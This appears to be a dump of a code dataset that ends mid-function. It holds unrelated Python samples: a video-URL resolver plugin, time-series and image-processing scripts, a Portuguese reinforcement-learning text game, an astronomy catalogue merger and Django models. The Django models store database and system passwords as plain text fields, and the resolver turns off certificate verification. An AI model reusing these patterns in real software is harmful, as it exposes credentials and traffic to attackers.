index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
9,500 | 8dfea24545ec4bb95b66d4b5ff3c4936990eb73a | """
Plugin for ResolveUrl
Copyright (C) 2022 shellc0de
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import re
import base64
from resolveurl import common
from resolveurl.plugins.lib import helpers, jsunhunt
from resolveurl.resolver import ResolveUrl, ResolverError
class TubeloadResolver(ResolveUrl):
name = 'tubeload'
domains = ['tubeload.co']
pattern = r'(?://|\.)(tubeload\.co)/(?:embed|e|f)/([0-9a-zA-Z]+)'
def get_media_url(self, host, media_id):
web_url = self.get_url(host, media_id)
rurl = 'https://{}/'.format(host)
headers = {
'Referer': rurl,
'User-Agent': common.FF_USER_AGENT
}
html = self.net.http_GET(web_url, headers=headers).content
if 'NOT FOUND' in html or 'Sorry' in html:
raise ResolverError('File Removed')
if jsunhunt.detect(html):
html = re.findall('<head>(.*?)</head>', html, re.S)[0]
html = jsunhunt.unhunt(html)
source = re.search(r'var\s*adbbdddffbad\s*=\s*"([^"]+)', html)
if source:
headers.update({'Origin': rurl[:-1], 'verifypeer': 'false'})
url = source.group(1).replace('MzY3Y2E4NTAzNmQ5NDkzN2FiNTQzZTBiNmI4YTIwYzg', '')
url = url.replace('NjYxOWU2OTNmZWQ0M2I3ZTFhM2U4NTc4Y2NhZmY3NmM=', '')
url = base64.b64decode(url).decode('utf-8')
return url + helpers.append_headers(headers)
raise ResolverError('File Not Found')
def get_url(self, host, media_id):
return self._default_get_url(host, media_id, template='https://{host}/e/{media_id}')
|
9,501 | 8e28135da60f8e11459697c4ae9c63e60c437d7a | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri May 24 18:46:26 2019
@author: kiran
"""
import matplotlib.pylab as plt
import pandas as pd
import numpy as np
import statsmodels as sm
from statsmodels.graphics.tsaplots import plot_acf, plot_pacf
from statsmodels.tsa.stattools import acf, pacf
from statsmodels.tsa.arima_model import ARIMA
from matplotlib.pylab import rcParams
rcParams['figure.figsize'] = 15,6
#importing library and preparing dataset
mylynx_df = pd.read_csv('LYNXdata.csv', header = 0, names = ['year','trappings'], index_col=0)
mylynxts = pd.Series(mylynx_df['trappings'].values, index = pd.DatetimeIndex(data=(tuple(pd.date_range(31/12/1821, periods = 114, freq = 'A-DEC'))), freq= 'A-DEC'))
#Dickey-fuller test
def stationarity_test(mylynxts):
from statsmodels.tsa.stattools import adfuller
print('Results of Dickey-Fuller Test:')
df_test = adfuller(mylynxts, autolag='AIC')
df_output = pd.Series(df_test[0:4], index=['Test Statistic','p-value','#lags_used','Number of Observation Used'])
print(df_output)
stationarity_test(mylynxts)
#Arima Model
model = ARIMA(mylynxts, order=(3,0,0))
results_AR = model.fit()
plt.plot(mylynxts)
plt.plot(results_AR.fittedvalues, color='red')
'''
information criteria and resdiuals need to be checked.
'''
#information summary
results_AR.summary()
#residual plot
fig = plt.figure(figsize=(12,8))
ax1 = fig.add_subplot(211)
fig = plot_acf(results_AR.resid, lags=20, ax = ax1)
#importing function for nomral distribution
from scipy.stats import norm
plt.figure(figsize=(10,6))
plt.hist(results_AR.resid, bins='auto', density=True, rwidth=0.85, label='residuals') #density true - norm.dist line curve
mu,std = norm.fit(results_AR.resid)
xmin,xmax = plt.xlim()
x = np.linspace(xmin,xmax,100)
p = norm.pdf(x,mu,std)
plt.plot(x,p,'m',linewidth=2)
plt.grid(axis='y',alpha=0.2)
plt.xlabel('Residuals')
plt.ylabel('Density')
plt.title('Residuals 2,0,0 vs Normal Distribution - Mean ='+ str(round(mu,2))+', std ='+str(round(std,2)))
plt.show()
|
9,502 | 7cf6a4b8057280b38572dd92693013724751c47f | import numpy as np
import cv2
print("read imafe from file" )
img = cv2.imread("panda.jpg")
print("create a window holder for the image")
cv2.namedWindow("Image",cv2.WINDOW_NORMAL)
print ('display the image ')
cv2.imshow("Image",img)
print ('press a key inside the image to make a copy')
cv2.waitKey(0)
|
9,503 | 22f4ae755e7ea43604db39452ca80f44f540708a | import pandas as pd
dict_data = {'c0': [1, 2, 3], 'c1': [4, 5, 6], 'c2': [
7, 8, 9], 'c3': [10, 11, 12], 'c4': [13, 14, 15]}
df = pd.DataFrame(dict_data)
print(type(df))
print('\n')
print(df)
# <class 'pandas.core.frame.DataFrame'>
# c0 c1 c2 c3 c4
# 0 1 4 7 10 13
# 1 2 5 8 11 14
# 2 3 6 9 12 15
|
9,504 | 38ffbb6a66837e975a611a57579bb365ab69a32c | """
\tSeja bem-vindo ao Admirável Mundo Novo!
\tO objetivo do jogo é dar suporte ao desenvolvimento de Agentes Inteligentes que utilizam Deep Reinforcement Learning
\tpara tarefas de Processamento de Linguagem Natural em língua portuguesa.
\tAutor: Gabriel Pontes (@ograndoptimist)
"""
import random
from source.emulador.textos import ESTADOS
from source.emulador.textos import ACOES
from source.emulador.textos import REFORCOS
from source.emulador.textos import FINALIZADO
from source.emulador.textos import DIMENSOES
print(__doc__)
class AdmiravelMundoNovo(object):
def __init__(self):
self.reforco = 0
self._checa_estado = False
self._estado_texto = None
self._estado_acao = None
self._finalizado = False
self._espaco_acoes = None
self._estados_texto = ESTADOS
self._acao_textos = ACOES
self._acao_dimensoes = DIMENSOES
self._estados_reforcos = REFORCOS
self._estados_finalizado = FINALIZADO
self._valores_estados_iniciais = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]
print("\tO objetivo do jogo é coletar a chave preciosa de ouro." +
".\n\tPara tal, você precisa vasculhar a Ilha da Fantasia.")
print()
self._escolha_estado_inicial()
def _escolha_estado_inicial(self):
escolha = random.choice(self._valores_estados_iniciais)
if escolha == 1:
self._estado_1()
elif escolha == 2:
self._estado_2()
elif escolha == 3:
self._estado_3()
elif escolha == 4:
self._estado_4()
elif escolha == 5:
self._estado_5()
elif escolha == 6:
self._estado_6()
elif escolha == 7:
self._estado_7()
elif escolha == 8:
self._estado_8()
elif escolha == 9:
self._estado_9()
elif escolha == 10:
self._estado_10()
elif escolha == 11:
self._estado_11()
elif escolha == 12:
self._estado_12()
elif escolha == 13:
self._estado_13()
elif escolha == 14:
self._estado_14()
def transicao_estado(self, acao):
if self._valor_estado == 2 and acao == 0:
self._estado_6()
elif self._valor_estado == 2 and acao == 1:
self._estado_3()
elif self._valor_estado in [1, 3, 4] and acao == 0:
self._estado_2()
elif self._valor_estado == 3 and acao == 1:
self._estado_5()
elif self._valor_estado == 2 and acao == 2:
self._estado_4()
elif self._valor_estado == 5 and acao == 1:
self._estado_3()
elif self._valor_estado == 6 and acao == 1:
self._estado_7()
elif self._valor_estado in [7, 8] and acao == 0:
self._estado_6()
elif self._valor_estado == 6 and acao == 2:
self._estado_8()
elif self._valor_estado in [6, 10, 11] and acao == 0:
self._estado_9()
elif self._valor_estado == 9 and acao == 1:
self._estado_10()
elif self._valor_estado == 9 and acao == 2:
self._estado_11()
elif self._valor_estado in [5, 9, 13] and acao == 0:
self._estado_12()
elif self._valor_estado == 12 and acao == 0:
self._estado_13()
elif self._valor_estado == 12 and acao == 1:
self._estado_final()
elif self._valor_estado == 9 and acao == 3:
self._estado_6()
elif self._valor_estado == 6 and acao == 3:
self._estado_2()
def _estado_1(self):
self._reforco_imediato = self._estados_reforcos['estado_1']
self.reforco += self._reforco_imediato
self._valor_estado = 1
self._finalizado = self._estados_finalizado['estado_1']
self._estado_texto = self._estados_texto['estado_1']
self._estado_acao = self._acao_textos['estado_1']
self._espaco_acoes = self._acao_dimensoes['estado_1']
def _estado_2(self):
self._reforco_imediato = self._estados_reforcos['estado_2']
self.reforco += self._reforco_imediato
self._valor_estado = 2
self._finalizado = self._estados_finalizado['estado_1']
self._estado_texto = self._estados_texto['estado_2']
self._estado_acao = self._acao_textos['estado_2']
self._espaco_acoes = self._acao_dimensoes['estado_2']
def _estado_3(self):
self._reforco_imediato = self._estados_reforcos['estado_3']
self.reforco += self._reforco_imediato
self._valor_estado = 3
self._finalizado = self._estados_finalizado['estado_1']
self._estado_texto = self._estados_texto['estado_3']
self._estado_acao = self._acao_textos['estado_3']
self._espaco_acoes = self._acao_dimensoes['estado_3']
def _estado_4(self):
self._reforco_imediato = self._estados_reforcos['estado_4']
self.reforco += self._reforco_imediato
self._valor_estado = 4
self._finalizado = self._estados_finalizado['estado_1']
self._estado_texto = self._estados_texto['estado_4']
self._estado_acao = self._acao_textos['estado_4']
self._espaco_acoes = self._acao_dimensoes['estado_4']
def _estado_5(self):
self._reforco_imediato = self._estados_reforcos['estado_5']
self.reforco += self._reforco_imediato
self._valor_estado = 5
self._finalizado = self._estados_finalizado['estado_1']
self._estado_texto = self._estados_texto['estado_5']
self._estado_acao = self._acao_textos['estado_5']
self._espaco_acoes = self._acao_dimensoes['estado_5']
def _estado_6(self):
self._reforco_imediato = self._estados_reforcos['estado_6']
self.reforco += self._reforco_imediato
self._valor_estado = 6
self._finalizado = self._estados_finalizado['estado_1']
self._estado_texto = self._estados_texto['estado_6']
self._estado_acao = self._acao_textos['estado_6']
self._espaco_acoes = self._acao_dimensoes['estado_6']
def _estado_7(self):
self._reforco_imediato = self._estados_reforcos['estado_7']
self.reforco += self._reforco_imediato
self._valor_estado = 7
self._finalizado = self._estados_finalizado['estado_1']
self._estado_texto = self._estados_texto['estado_7']
self._estado_acao = self._acao_textos['estado_7']
self._espaco_acoes = self._acao_dimensoes['estado_7']
def _estado_8(self):
self._reforco_imediato = self._estados_reforcos['estado_7']
self.reforco += self._reforco_imediato
self._valor_estado = 8
self._finalizado = self._estados_finalizado['estado_1']
self._estado_texto = self._estados_texto['estado_8']
self._estado_acao = self._acao_textos['estado_7']
self._espaco_acoes = self._acao_dimensoes['estado_7']
def _estado_9(self):
self._reforco_imediato = self._estados_reforcos['estado_9']
self.reforco += self._reforco_imediato
self._valor_estado = 9
self._finalizado = self._estados_finalizado['estado_1']
self._estado_texto = self._estados_texto['estado_9']
self._estado_acao = self._acao_textos['estado_9']
self._espaco_acoes = self._acao_dimensoes['estado_9']
def _estado_10(self):
self._reforco_imediato = self._estados_reforcos['estado_10']
self.reforco += self._reforco_imediato
self._valor_estado = 10
self._finalizado = self._estados_finalizado['estado_1']
self._estado_texto = self._estados_texto['estado_10']
self._estado_acao = self._acao_textos['estado_10']
self._espaco_acoes = self._acao_dimensoes['estado_10']
def _estado_11(self):
self._reforco_imediato = self._estados_reforcos['estado_10']
self.reforco += self._reforco_imediato
self._valor_estado = 11
self._finalizado = self._estados_finalizado['estado_1']
self._estado_texto = self._estados_texto['estado_11']
self._estado_acao = self._acao_textos['estado_10']
self._espaco_acoes = self._acao_dimensoes['estado_10']
def _estado_12(self):
self._reforco_imediato = self._estados_reforcos['estado_12']
self.reforco += self._reforco_imediato
self._valor_estado = 12
self._finalizado = self._estados_finalizado['estado_1']
self._estado_texto = self._estados_texto['estado_12']
self._estado_acao = self._acao_textos['estado_12']
self._espaco_acoes = self._acao_dimensoes['estado_12']
def _estado_13(self):
self._reforco_imediato = self._estados_reforcos['estado_13']
self.reforco -= self._reforco_imediato
self._valor_estado = 13
self._finalizado = self._estados_finalizado['estado_1']
self._estado_texto = self._estados_texto['estado_13']
self._estado_acao = self._acao_textos['estado_13']
self._espaco_acoes = self._acao_dimensoes['estado_13']
def _estado_14(self):
self._reforco_imediato = self._estados_reforcos['estado_14']
self.reforco -= self._reforco_imediato
self._valor_estado = 14
self._finalizado = self._estados_finalizado['estado_14']
self._estado_texto = self._estados_texto['estado_14']
self._estado_acao = self._acao_textos['estado_14']
self._espaco_acoes = self._acao_dimensoes['estado_14']
def _estado_final(self):
self._reforco_imediato = self._estados_reforcos['estado_final']
self.reforco += self._reforco_imediato
self._finalizado = self._estados_finalizado['estado_final']
self._estado_texto = self._estados_texto['estado_final']
print("\tReforço acumulado de {0}".format(self.reforco))
self._estado_acao = ""
def _pacote_acoes(self):
if self._valor_estado in [1, 4, 7, 8, 10, 11, 13]:
return [0]
elif self._valor_estado in [2]:
return [0, 1, 2]
elif self._valor_estado in [3, 5, 12]:
return [0, 1]
elif self._valor_estado in [9, 6]:
return [0, 1, 2, 3]
def checa_acao(self, acao):
if acao in self._pacote_acoes():
return True
else:
return False
def read_1(self):
return self._estado_texto, self._estado_acao, self._espaco_acoes, self._reforco_imediato, self._finalizado
def read(self):
return self._estado_texto, self._estado_acao, self._espaco_acoes
def imprime_acao(self, acoes):
for cont, acao in enumerate(acoes):
print("\t[{0}] {1}".format(cont, acao))
def emulador(self, acao):
if self._valor_estado == 2 and acao == 0: # ok
return self._estados_texto['estado_6'], self._acao_textos['estado_6'], self._acao_dimensoes['estado_6'], \
self._estados_reforcos['estado_6'], self._estados_finalizado['estado_1']
elif self._valor_estado == 2 and acao == 1: # ok
return self._estados_texto['estado_9'], self._acao_textos['estado_9'], self._acao_dimensoes['estado_9'], \
self._estados_reforcos['estado_9'], self._estados_finalizado['estado_1']
elif self._valor_estado in [1, 3, 4] and acao == 0:
return self._estados_texto['estado_2'], self._acao_textos['estado_2'], self._acao_dimensoes['estado_2'], \
self._estados_reforcos['estado_2'], self._estados_finalizado['estado_1']
elif self._valor_estado == 3 and acao == 1:
return self._estados_texto['estado_5'], self._acao_textos['estado_5'], self._acao_dimensoes['estado_5'], \
self._estados_reforcos['estado_5'], self._estados_finalizado['estado_1']
elif self._valor_estado == 2 and acao == 2: # ok
return self._estados_texto['estado_4'], self._acao_textos['estado_4'], self._acao_dimensoes['estado_4'], \
self._estados_reforcos['estado_4'], self._estados_finalizado['estado_1']
elif self._valor_estado == 5 and acao == 1:
return self._estados_texto['estado_9'], self._acao_textos['estado_9'], self._acao_dimensoes['estado_9'], \
self._estados_reforcos['estado_9'], self._estados_finalizado['estado_1']
elif self._valor_estado == 6 and acao == 1:
return self._estados_texto['estado_7'], self._acao_textos['estado_7'], self._acao_dimensoes['estado_7'], \
self._estados_reforcos['estado_7'], self._estados_finalizado['estado_1']
elif self._valor_estado in [7, 8] and acao == 0:
return self._estados_texto['estado_6'], self._acao_textos['estado_6'], self._acao_dimensoes['estado_6'], \
self._estados_reforcos['estado_6'], self._estados_finalizado['estado_1']
elif self._valor_estado == 6 and acao == 2:
return self._estados_texto['estado_8'], self._acao_textos['estado_7'], self._acao_dimensoes['estado_7'], \
self._estados_reforcos['estado_7'], self._estados_finalizado['estado_1']
elif self._valor_estado == 9 and acao == 1:
return self._estados_texto['estado_10'], self._acao_textos['estado_10'], self._acao_dimensoes['estado_10'], \
self._estados_reforcos['estado_10'], self._estados_finalizado['estado_1']
elif self._valor_estado in [6, 10, 11] and acao == 0:
return self._estados_texto['estado_9'], self._acao_textos['estado_9'], self._acao_dimensoes['estado_9'], \
self._estados_reforcos['estado_9'], self._estados_finalizado['estado_1']
elif self._valor_estado == 9 and acao == 2:
return self._estados_texto['estado_11'], self._acao_textos['estado_10'], self._acao_dimensoes['estado_10'], \
self._estados_reforcos['estado_10'], self._estados_finalizado['estado_1']
elif self._valor_estado in [5, 9, 13] and acao == 0:
return self._estados_texto['estado_12'], self._acao_textos['estado_12'], self._acao_dimensoes['estado_12'], \
self._estados_reforcos['estado_12'], self._estados_finalizado['estado_1']
elif self._valor_estado == 12 and acao == 0:
return self._estados_texto['estado_13'], self._acao_textos['estado_13'], self._acao_dimensoes['estado_13'], \
self._estados_reforcos['estado_13'], self._estados_finalizado['estado_1']
elif self._valor_estado == 12 and acao == 1:
return self._estados_texto['estado_final'], self._acao_textos['estado_final'], self._acao_dimensoes[
'estado_final'], self._estados_reforcos['estado_final'], self._estados_finalizado['estado_final']
elif self._valor_estado == 9 and acao == 3:
return self._estados_texto['estado_6'], self._acao_textos['estado_6'], self._acao_dimensoes['estado_6'], \
self._estados_reforcos['estado_6'], self._estados_finalizado['estado_1']
elif self._valor_estado == 6 and acao == 3:
return self._estados_texto['estado_2'], self._acao_textos['estado_2'], self._acao_dimensoes['estado_2'], \
self._estados_reforcos['estado_2'], self._estados_finalizado['estado_1']
|
9,505 | 6e845f2543b548fb936cc3719eb150e530281945 | stevila = [5, 2, 8, 3]
#Izpis vseh števil
print(stevila)
#Izpis števila na mestu 1
print(stevila[1]) |
9,506 | e81294c984497dbba9fa345b61abb8d781f136bf | #######################
# PYMERGE V.1.1 #
#######################
# Samuel Farrens 2014 #
#######################
"""@file pycatcut.v.1.1
@brief Code that merges cluster catalogues into a single catalogue.
@author Samuel Farrens
"""
import math, optparse, numpy as np
import errors
from classes.cluster import Cluster
from functions import merge, options
# Functions:
def read_file(file):
"""
Function that reads a "galaxies" file and extracts the relevant fields.
"""
if opts.input_type == 'fits':
data = fileio.read_fits(file)
else:
data = fileio.read_ascii(file)
c_id = data[0,:]
g_num = np.array(range(len(c_id)), dtype = 'int')
g_id = data[3,:]
g_ra = np.array(data[4,:], dtype = 'float')
g_dec = np.array(data[5,:], dtype = 'float')
g_z = np.array(data[6,:], dtype = 'float')
return c_id, g_num, g_id, g_ra, g_dec, g_z
def gal_count(clusters):
"""
Function that computes the total number of galaxies in clusters.
"""
sum = 0
for x in clusters:
sum += x.ngal
return sum
# Read Arguments:
parser = optparse.OptionParser()
options.multiple_input(parser)
options.single_output(parser)
options.merge(parser)
(opts, args) = parser.parse_args()
if not opts.input_files and not opts.input_file_list:
parser.error('Input filename(s) not provided.')
if not opts.output_file:
parser.error('Output filename not provided.')
if not opts.bg_expect:
parser.error('Expected background density not provided.')
# Read List of Files:
if opts.input_file_list:
errors.file_name_error(opts.input_file_list)
file_list = np.genfromtxt(opts.input_file_list, dtype="S", unpack = True)
elif opts.input_files:
file_list = opts.input_files
# Read Files and Store Elements in Clusters:
clusters = []
cluster_count = 0
for file in file_list:
errors.file_name_error(file)
print 'Reading: ', file
c_id, g_num, g_id, g_ra, g_dec, g_z = read_file(file)
cluster_list = np.unique(c_id)
for clt in cluster_list:
index = (c_id == clt)
clusters.append(Cluster(cluster_count))
clusters[cluster_count].extend(g_num[index], g_id[index], g_ra[index], g_dec[index], g_z[index])
clusters[cluster_count].props(opts.bg_expect)
cluster_count += 1
# Find matches and merge clusters:
print 'Original number of clusters:', len(clusters)
print 'Original number of cluster members:', gal_count(clusters)
print 'Finding cluster matches and merging:'
merge.merge_clusters(clusters, opts.progress, opts.bg_expect, 0.5, 0.2)
print 'Final number of merged clusters:', len(clusters)
print 'Final number of merged cluster members:', gal_count(clusters)
# Output merged clusters:
ngals = []
for i in range(len(clusters)):
ngals.append(clusters[i].ngal)
ngals = np.array(ngals)
index = ngals.argsort()[::-1]
if opts.output_type == 'ascii':
clt_file = opts.output_file + '_clusters.dat'
gal_file = opts.output_file + '_galaxies.dat'
clt_out = open(clt_file,'w')
gal_out = open(gal_file,'w')
print>> clt_out, '#C_ID C_RA C_DEC C_Z C_NGAL C_SN C_AREA C_SIZE'
print>> gal_out, '#C_ID C_NGAL G_ID G_RA G_DEC G_Z'
for i in index:
print>> clt_out, '%012d' % clusters[i].id,'%07.3f' % clusters[i].ra,
print>> clt_out, '%+07.3f' % clusters[i].dec, '%05.3f' % clusters[i].z,
print>> clt_out, '%06d' % clusters[i].ngal, '%06.3f' % clusters[i].sn,
print>> clt_out, '%06.3f' % clusters[i].area, '%06.3f' % clusters[i].size
for j in range(clusters[i].ngal):
print>> gal_out, '%012d' % clusters[i].id,'%06d' % clusters[i].ngal,
print>> gal_out, '%12s' % clusters[i].g_id[j],'%07.3f' % clusters[i].g_ra[j],
print>> gal_out, '%+07.3f' % clusters[i].g_dec[j], '%05.3f' % clusters[i].g_z[j]
else:
clt_file = opts.output_file + '_clusters.fits'
gal_file = opts.output_file + '_galaxies.fits'
c_id = []
c_ra = []
c_dec = []
c_z = []
c_ngal = []
c_sn = []
c_area = []
c_size = []
c_id2 = []
c_ngal2 = []
g_id = []
g_ra = []
g_dec = []
g_z = []
for i in index:
c_id.append(clusters[i].id)
c_ra.append(clusters[i].ra)
c_dec.append(clusters[i].dec)
c_z.append(clusters[i].z)
c_ngal.append(clusters[i].ngal)
c_sn.append(clusters[i].sn)
c_area.append(clusters[i].area)
c_size.append(clusters[i].size)
for j in range(clusters[i].ngal):
c_id2.append(clusters[i].id)
c_ngal2.append(clusters[i].ngal)
g_id.append(clusters[i].g_id[j])
g_ra.append(clusters[i].g_ra[j])
g_dec.append(clusters[i].g_dec[j])
g_z.append(clusters[i].g_z[j])
c_id = np.array(c_id)
c_ra = np.array(c_ra, dtype = 'float')
c_dec = np.array(c_dec, dtype = 'float')
c_z = np.array(c_z, dtype = 'float')
c_ngal = np.array(c_ngal, dtype = 'float')
c_sn = np.array(c_sn, dtype = 'float')
c_area = np.array(c_area, dtype = 'float')
c_size =np.array(c_size, dtype = 'float')
c_id2 = np.array(c_id2)
c_ngal2 = np.array(c_ngal2, dtype = 'float')
g_id = np.array(g_id)
g_ra = np.array(g_ra, dtype = 'float')
g_dec = np.array(g_dec, dtype = 'float')
g_z = np.array(g_z, dtype = 'float')
from astropy.io import fits
tbhdu1 = fits.new_table(fits.ColDefs([fits.Column(name='c_id', format='8A', array = c_id),
fits.Column(name='c_ra', format='D', array = c_ra),
fits.Column(name='c_dec', format='D', array = c_dec),
fits.Column(name='c_z', format='D', array = c_z),
fits.Column(name='c_ngal', format='D', array = c_ngal),
fits.Column(name='c_sn', format='D', array = c_sn),
fits.Column(name='c_area', format='D', array = c_area),
fits.Column(name='c_size', format='D', array = c_size)]))
tbhdu2 = fits.new_table(fits.ColDefs([fits.Column(name='c_id', format='8A', array = c_id2),
fits.Column(name='c_ngal', format='D', array = c_ngal2),
fits.Column(name='g_id', format='8A', array = g_id),
fits.Column(name='g_ra', format='D', array = g_ra),
fits.Column(name='g_dec', format='D', array = g_dec),
fits.Column(name='g_z', format='D', array = g_z)]))
n = np.arange(100.0)
hdu = fits.PrimaryHDU(n)
thdulist1 = fits.HDUList([hdu, tbhdu1])
thdulist2 = fits.HDUList([hdu, tbhdu2])
thdulist1.writeto(clt_file)
thdulist2.writeto(gal_file)
|
9,507 | 00fd5efa4c66b7bd4617f4c886eddcdf38b951b7 | print ("Hello, Django girls!")
volume = 57
if volume < 20:
print("It's kinda quiet.")
elif 20 <= volume < 40:
print("It's nice for background music")
elif 40 <= volume < 60:
print("Perfect, I can hear all the details")
elif 60 <= volume < 80:
print("Nice for parties")
elif 80 <= volume < 100:
print("A bit loud!")
else:
print("My ears are hurting! :(")
def hi():
print('Hi there!')
print('How are you?')
hi() |
9,508 | 8cb7290792f9390dd350e0c79711e0dd72d6063b | a=range(1,11) #1~10숫자를 에이에 저장
b=1
for i in a: #a에있는 원소를 b에 곱하고 비에 저장
b*=i
print(b)
|
9,509 | c2490c3aacfa3ce22c3f47a69dbc44b695c2a2e5 | # -*- coding:utf-8 -*-
from __future__ import unicode_literals
from django.db import models
SERVICE_RANGE_CHOISE = {(1, '1年'), (2, '2年'), (3, '3年'), (4, '4年'), (5, '5年'), (6, '6年'), (7, '7年'), (8, '8年'), (0, '长期')}
USER_STATUS_CHOISE = {(1, '停用'), (2, '正常'), (3, '锁定')}
DBSERVER_POS_CHOISE = {(1, '8层机房'), (2, '11层机房')}
FIRM_CHOISE = {(1, 'DELL'), (2, 'IBM'), (3, 'EMC')}
class Odbserver(models.Model):
name = models.CharField(max_length=30, verbose_name='名称')
ip = models.GenericIPAddressField(verbose_name='IP')
pos = models.IntegerField(default=1, choices=DBSERVER_POS_CHOISE, verbose_name='位置')
sn = models.CharField(null=True, blank=True, max_length=50, verbose_name='序列号')
sid = models.CharField(null=True, blank=True, max_length=50, verbose_name='快速服务代码')
firm = models.IntegerField(default=1, choices=FIRM_CHOISE, verbose_name='厂商')
model = models.CharField(null=True, blank=True, max_length=30, verbose_name='型号')
feature = models.TextField(null=True, blank=True, verbose_name='配置')
buy_time = models.DateField(null=True, blank=True, verbose_name='购买时间')
service_range = models.IntegerField(default=1, choices=SERVICE_RANGE_CHOISE, verbose_name='服务年限')
comment = models.TextField(null=True, blank=True, verbose_name='备注')
class Meta:
ordering = ["name"]
verbose_name = '服务器信息'
verbose_name_plural = verbose_name
def __unicode__(self):
return u'%s' % self.name
def __str__(self):
return u'%s' % self.name
class Ousers(models.Model):
dbserver = models.ForeignKey(Odbserver, null=True, blank=True, verbose_name='服务器')
user = models.CharField(max_length=20, verbose_name='用户名')
passwd = models.CharField(max_length=20, verbose_name='密码')
tablespace = models.CharField(max_length=20, null=True, blank=True, verbose_name='表空间')
status = models.IntegerField(choices=USER_STATUS_CHOISE, verbose_name='状态')
business = models.CharField(null=True, blank=True, max_length=100, verbose_name='业务')
created = models.DateField(null=True, blank=True, verbose_name='创建时间')
comment = models.TextField(null=True, blank=True, verbose_name='备注')
class Meta:
ordering = ["user"]
verbose_name = '数据库用户信息'
verbose_name_plural = verbose_name
def __unicode__(self):
return u'%s' % self.business
def __str__(self):
return u'%s' % self.business
class Osysusers(models.Model):
dbserver = models.ForeignKey(Odbserver, null=True, blank=True, verbose_name='服务器')
name = models.CharField(max_length=20, verbose_name='名称')
user = models.CharField(max_length=20, verbose_name='用户')
passwd = models.CharField(max_length=20, verbose_name='密码')
class Meta:
ordering = ["dbserver"]
verbose_name = '系统用户信息'
verbose_name_plural = verbose_name
def __unicode__(self):
return u'%s' % self.name
def __str__(self):
return u'%s' % self.name
class Omysqluser(models.Model):
dbserver = models.ForeignKey(Odbserver, verbose_name='服务器')
name = models.CharField(max_length=20, verbose_name='用户名')
passwd = models.CharField(max_length=20, verbose_name='密码')
dbname = models.CharField(max_length=20, verbose_name='数据库名')
business = models.CharField(null=True, blank=True, max_length=100, verbose_name='业务')
comment = models.TextField(null=True, blank=True, verbose_name='备注')
class Meta:
ordering = ["dbserver"]
verbose_name = 'MYSQL用户信息'
verbose_name_plural = verbose_name
def __unicode__(self):
return u'%s' % self.business
def __str__(self):
return u'%s' % self.business
|
9,510 | c3a7a8a006f717057a7ad2920f19d82842b04a85 | import cv2
import numpy as np
import matplotlib.pyplot as plt
'''
def diff_of_gaussians(img):
grey_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
blur_img_grey = cv2.GaussianBlur(grey_img, (9,9), 0)
blur_img_colour = cv2.GaussianBlur(img, (9,9), 0)
#plt.figure(figsize = (20,2))
#plt.imshow(blur_img_grey, cmap = 'gray')
#plt.show()
#plt.imshow(blur_img_colour)
#plt.show()
fig, [[ax1, ax2], [ax3, ax4]] = plt.subplots(nrows = 2, ncols = 2)
edges_grey = cv2.Canny(grey_img,100,200)
edges = cv2.Canny(img, 100, 200)
#plt.subplot(411)
ax1.imshow(edges_grey, cmap = 'gray')
#plt.imshow(edges_grey, cmap = 'gray')
#plt.show()
#plt.subplot(412)
ax2.imshow(edges);
#plt.imshow(edges)
#plt.subplot(421)
ax3.imshow(canny(grey_img), cmap = 'gray')
#plt.show()
#plt.subplot(422)
ax4.imshow(canny(img))
#plt.show()
plt.show()
#plt.imshow(blur_img_grey - grey_img, cmap = 'gray')
#plt.show()
#plt.imshow(blur_img_colour - img)
#plt.show()
return
'''
def canny(img):
# changes in intensity are to be captured.
# Canny and the Sobel operator work no greyscale images
grey_img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
# Gaussian Blurring to reduce noise, removes high-frequncy components in the image
# High frequency due to high ISO of the camera, contours that aren't really edges.
# https://www.youtube.com/watch?v=uihBwtPIBxM
blurred_img = cv2.GaussianBlur(grey_img, (9,9), 0)
# Canny Edge Detector, identifying any sharp changes in intesity, Uses edge-gradients
# the strongest gradents are then traced
# https://www.youtube.com/watch?v=sRFM5IEqR2w
canny_filtered = cv2.Canny(blurred_img, 30, 150)
return canny_filtered
def region_of_interest(img):
height, width = img.shape
height -= 60
width -= 10
#Reducing the image size to "focus" more on the center of the frame (region of interest)
#These dimensions are later used in the generation of the mask
#The reduction in height enables us to ignore the part of the image corresponding to the dashboard.
#Coordinates marking our "region of interest"
#The top-left of the image is (0,0)
Polygons = np.array([
[(width, height),(50, height), (int((3/8) * width), int((3/4) * height)),(int((5/8) * width), int((3/4) * height))]
])
#(width, height),(50,height) removes what's visible of the dash of the car.
mask = np.zeros_like(img)
# filling mask
cv2.fillConvexPoly(img = mask, points = Polygons, color = 255, lineType = cv2.LINE_AA)
# Uncomment "return mask" to see the "region of interest" marked in white
mask_img = cv2.bitwise_and(img, mask)
# mask_img now has the detected edges in our region of interest.
#return mask
return mask_img
def dispay_lines(img, lines):
line_img = np.zeros_like(img)
if lines is not None:
for x1,y1,x2,y2 in lines:
cv2.line(line_img, (x1,y1), (x2,y2), (0,255,0), 30)
return line_img
def get_cords(img, line_slope_int):
slope, intercept = line_slope_int
y1 = img.shape[0]
#Line starts from the bottom left
y2 = int(y1 * (4/5))
# The line goes 1 fifth of the way up
x1 = int((y1 - intercept) / slope)
x2 = int((y2 - intercept) / slope)
#from y = mx + c
#print(img.shape)
height, width, _ = img.shape
if x1 > width or x1 < 0 or x2 > width or x2 < 0 or y1 > height or y1 < 0 or y2 > height or y2 < 0:
return np.array([0,0,0,0])
return np.array([x1, y1, x2, y2])
def average_slope_intercept(img, lines):
left_fit = []
right_fit = []
#if lines is None:
# return (np.array([0,0,0,0]), np.array([0,0,0,0]))
for line in lines:
x1, y1, x2, y2 = line.reshape(4)
slope, intercept = np.polyfit((x1,x2), (y1,y2), 1)
#Linear least squares :) (not exactly but it's easy to think of it like this)
print(slope, intercept)
#left lines have a positive slope.
if slope >= 0:
